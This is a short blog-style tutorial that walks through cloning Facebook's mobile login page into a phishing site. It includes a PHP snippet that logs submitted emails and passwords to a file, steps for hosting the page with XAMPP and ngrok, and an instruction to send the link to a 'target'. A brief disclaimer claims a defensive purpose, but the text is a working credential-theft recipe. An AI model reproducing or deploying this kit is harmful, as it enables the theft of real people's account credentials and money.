What is Phishing??
Phishing can be defined as the “practice of sending emails appearing to be from reputable sources with the goal of influencing or gaining personal information,”
Wikipedia : “Phishing is the attempt to obtain sensitive information such as usernames, passwords, and credit card details (and, indirectly, money), often for malicious reasons, by disguising as a trustworthy entity in an electronic communication.”
NOTICE: This information should never be used to perform illegal acts! We discuss these details to help organizations think offensively about possible social engineering attacks and to help mitigate against these attacks.
Making an phishing Page
I will show a example phishing of facebook mobile login page
Website :- m.facebook.com
- First of all open website and right click anywhere on the page and choose ‘view page source’ .
- copy the code in notepad and the search for action and replace facebook (login button action) URL with ‘login.php’ .
- Now save it as index.PHP
- Now open notepad and copy following code.
$file = fopen(‘log.txt’, ‘a’);
fwrite($file, ‘Email = ‘ . $_POST[’email’] . PHP_EOL);
fwrite($file, ‘Pass = ‘ . $_POST[‘pass’] . PHP_EOL . PHP_EOL);
- Save it as login.PHP
- Our phishing page is ready now we need to host it so that our target can access it. You can use free hosting service like 000webhost , here i’m using ngrok and xampp .
- Install ngrok and xampp and then copy index.PHP and login.PHP in htdocs folder inside xampp folder (delete all the files in htdocs folder first).
- Open XAMPP and start apache and mysql service.
- now open ngrok and type ‘ ngrok http 80 ‘ .
- you will get a url followed by ngrok.io. Send it to your target and ENJOY!!
Watch video on Phishing!!
Don’t forget to like us on facebook !!